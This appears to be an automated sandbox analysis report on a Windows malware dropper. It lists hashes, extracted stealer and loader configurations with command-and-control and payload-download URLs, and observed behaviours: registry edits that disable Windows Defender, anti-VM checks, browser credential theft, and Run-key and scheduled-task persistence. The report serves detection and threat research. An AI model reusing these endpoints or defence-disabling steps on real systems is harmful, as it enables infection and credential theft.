Analysis
-
max time kernel
82s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
21-02-2025 13:05
Static task
static1
Behavioral task
behavioral1
Sample
ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe
Resource
win10v2004-20250217-en
General
-
Target
ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe
-
Size
2.0MB
-
MD5
c2c6cc5d4019b416d4a9ca209a7ba05d
-
SHA1
79e755bf745e4b6edfdd244cda8cd5b27cc93892
-
SHA256
ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305
-
SHA512
2844cc2a9a6bce504bd0b42abd1f565920c284a4d85d67b154bd8c6e6cdbaf421eb91e29be741dd53e51c6ed097d1472be868e4f38039844b72a4a5d21b1d925
-
SSDEEP
49152:eDRjeHrejAd2+D5bkclFFOFaRBsd/pwA:6eHrejAw+lbkclF/Bmp9
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://prideforgek.fun/api
https://pausedcritiaca.fun/api
Signatures
-
Amadey family
-
Detect Vidar Stealer 35 IoCs
resource yara_rule behavioral2/memory/1396-354-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-377-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-378-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-379-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-396-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-460-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-476-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-479-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/5064-482-0x00000000004D0000-0x0000000000948000-memory.dmp family_vidar_v7 behavioral2/memory/1396-489-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-493-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-496-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-500-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-502-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-503-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-504-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1288-553-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-559-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-579-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-576-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-584-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-587-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-592-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-593-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-597-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-598-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-617-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-623-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-624-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-625-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1288-628-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1288-648-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1288-649-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1396-650-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1288-651-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/3792-150-0x00000000004C0000-0x000000000090C000-memory.dmp healer behavioral2/memory/3792-151-0x00000000004C0000-0x000000000090C000-memory.dmp healer behavioral2/memory/3792-278-0x00000000004C0000-0x000000000090C000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/5064-484-0x00000000004D0000-0x0000000000948000-memory.dmp family_sectoprat behavioral2/memory/5064-485-0x00000000004D0000-0x0000000000948000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebp51gY.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebp51gY.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dc4389cbe4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e4ba85a4b8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1f3d74c1b3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 147f6a383d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b6d51169a9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2e30e39d85.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9b709fec1f.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 19 2352 powershell.exe 43 2144 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 2352 powershell.exe 2144 powershell.exe 4928 powershell.exe 3392 powershell.exe 4876 powershell.exe 1520 powershell.exe -
Downloads MZ/PE file 16 IoCs
flow pid Process 17 3532 skotes.exe 19 2352 powershell.exe 43 2144 powershell.exe 12 3532 skotes.exe 12 3532 skotes.exe 12 3532 skotes.exe 12 3532 skotes.exe 12 3532 skotes.exe 12 3532 skotes.exe 12 3532 skotes.exe 12 3532 skotes.exe 12 3532 skotes.exe 12 3532 skotes.exe 12 3532 skotes.exe 12 3532 skotes.exe 12 3532 skotes.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1868 chrome.exe 3944 chrome.exe 1016 chrome.exe 3376 msedge.exe 1212 msedge.exe 3952 msedge.exe 2004 chrome.exe 1684 msedge.exe 2632 msedge.exe -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e4ba85a4b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2e30e39d85.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2e30e39d85.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9b709fec1f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9b709fec1f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b6d51169a9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 147f6a383d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dc4389cbe4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1f3d74c1b3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1f3d74c1b3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b6d51169a9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dc4389cbe4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 147f6a383d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e4ba85a4b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebp51gY.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 21 IoCs
pid Process 3532 skotes.exe 3664 lwtLxxH.exe 4916 skotes.exe 4984 7nSTXG6.exe 5020 bf320a244b.exe 3792 TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE 3184 ebp51gY.exe 448 1f3d74c1b3.exe 1872 483d2fa8a0d53818306efeb32d3.exe 2548 ebp51gY.exe 1828 DTQCxXZ.exe 3404 7nSTXG6.exe 3056 147f6a383d.exe 4896 9b709fec1f.exe 3000 ad2c31f5a6.exe 2472 f04fa5d470.exe 4820 b6d51169a9.exe 1432 dc4389cbe4.exe 2464 skotes.exe 5064 e4ba85a4b8.exe 2544 2e30e39d85.exe -
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine e4ba85a4b8.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 9b709fec1f.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine ebp51gY.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 1f3d74c1b3.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine dc4389cbe4.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine b6d51169a9.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine ebp51gY.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 147f6a383d.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 2e30e39d85.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf320a244b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090366101\\bf320a244b.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090367021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ipinfo.io -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000b000000023c2c-74.dat autoit_exe behavioral2/files/0x0007000000023ded-671.dat autoit_exe behavioral2/files/0x0008000000023de0-699.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid Process 760 ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe 3532 skotes.exe 4916 skotes.exe 3792 TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE 3184 ebp51gY.exe 448 1f3d74c1b3.exe 1872 483d2fa8a0d53818306efeb32d3.exe 2548 ebp51gY.exe 3056 147f6a383d.exe 4896 9b709fec1f.exe 4820 b6d51169a9.exe 1432 dc4389cbe4.exe 2464 skotes.exe 5064 e4ba85a4b8.exe 2544 2e30e39d85.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4984 set thread context of 1396 4984 7nSTXG6.exe 131 PID 3404 set thread context of 1288 3404 7nSTXG6.exe 155 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 688 1016 WerFault.exe 168 -
System Location Discovery: System Language Discovery 1 TTPs 36 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9b709fec1f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b6d51169a9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebp51gY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bf320a244b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebp51gY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e4ba85a4b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dc4389cbe4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7nSTXG6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 147f6a383d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ad2c31f5a6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f04fa5d470.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7nSTXG6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1f3d74c1b3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2e30e39d85.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString BitLockerToGo.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4368 timeout.exe 2872 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 116 taskkill.exe 3052 taskkill.exe 3092 taskkill.exe 1412 taskkill.exe 2092 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846168181957081" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3192 schtasks.exe 3008 schtasks.exe 1964 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 760 ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe 760 ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe 3532 skotes.exe 3532 skotes.exe 3664 lwtLxxH.exe 3664 lwtLxxH.exe 4916 skotes.exe 4916 skotes.exe 3664 lwtLxxH.exe 3664 lwtLxxH.exe 2352 powershell.exe 2352 powershell.exe 3392 powershell.exe 3392 powershell.exe 3792 TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE 3792 TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE 4876 powershell.exe 4876 powershell.exe 3184 ebp51gY.exe 3184 ebp51gY.exe 3792 TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE 3792 TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE 1520 powershell.exe 1520 powershell.exe 2144 powershell.exe 2144 powershell.exe 448 1f3d74c1b3.exe 448 1f3d74c1b3.exe 1872 483d2fa8a0d53818306efeb32d3.exe 1872 483d2fa8a0d53818306efeb32d3.exe 3184 ebp51gY.exe 3184 ebp51gY.exe 3184 ebp51gY.exe 3184 ebp51gY.exe 2548 ebp51gY.exe 2548 ebp51gY.exe 2548 ebp51gY.exe 2548 ebp51gY.exe 2548 ebp51gY.exe 2548 ebp51gY.exe 1828 DTQCxXZ.exe 1828 DTQCxXZ.exe 1828 DTQCxXZ.exe 1828 DTQCxXZ.exe 3056 147f6a383d.exe 3056 147f6a383d.exe 3056 147f6a383d.exe 3056 147f6a383d.exe 3056 147f6a383d.exe 3056 147f6a383d.exe 4896 9b709fec1f.exe 4896 9b709fec1f.exe 1396 BitLockerToGo.exe 1396 BitLockerToGo.exe 1396 BitLockerToGo.exe 1396 BitLockerToGo.exe 4820 b6d51169a9.exe 4820 b6d51169a9.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 4820 b6d51169a9.exe 4820 b6d51169a9.exe 4820 b6d51169a9.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
